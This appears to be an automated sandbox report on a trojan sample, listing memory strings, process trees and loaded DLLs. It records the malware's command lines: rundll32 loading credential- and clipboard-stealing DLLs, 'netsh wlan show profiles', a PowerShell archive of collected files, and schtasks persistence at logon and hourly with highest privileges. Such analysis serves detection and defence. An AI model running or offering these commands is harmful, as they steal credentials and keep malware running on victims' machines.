Source: ad0e9cf6d6.exe, 0000000E.00000002.2890860265.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, ad0e9cf6d6.exe, 0000000E.00000003.2393485516.0000000005340000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2438871880.0000000005320000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2890551261.00000000009A1000.00000040.00000001.01000000.00000010.sdmp, MPGPH131.exe, 00000014.00000003.2440483320.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2891741375.00000000009A1000.00000040.00000001.01000000.00000010.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2890561636.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, ad0e9cf6d6.exe, 00000016.00000003.2495106365.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000003.2578285726.00000000056F0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000002.2890907498.0000000000E31000.00000040.00000001.01000000.00000013.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: cred64[1].dll.6.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: ad0e9cf6d6.exe, 0000000E.00000002.2890860265.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, ad0e9cf6d6.exe, 0000000E.00000003.2393485516.0000000005340000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2438871880.0000000005320000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2890551261.00000000009A1000.00000040.00000001.01000000.00000010.sdmp, MPGPH131.exe, 00000014.00000003.2440483320.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2891741375.00000000009A1000.00000040.00000001.01000000.00000010.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2890561636.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, ad0e9cf6d6.exe, 00000016.00000003.2495106365.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000003.2578285726.00000000056F0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000002.2890907498.0000000000E31000.00000040.00000001.01000000.00000013.sdmp Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: cred64[1].dll.6.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: cred64[1].dll.6.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: cred64[1].dll.6.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: rundll32.exe, 00000008.00000002.2450226998.000002E174328000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: cred64[1].dll.6.dr Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Virustotal: Detection: 57%
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe ReversingLabs: Detection: 47%
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorha.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorha.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe "C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe"
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: unknown Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe "C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe "C:\Users\user\AppData\Local\Temp\1000049001\amert.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
Source: unknown Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe "C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe "C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe "C:\Users\user\AppData\Local\Temp\1000049001\amert.exe"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
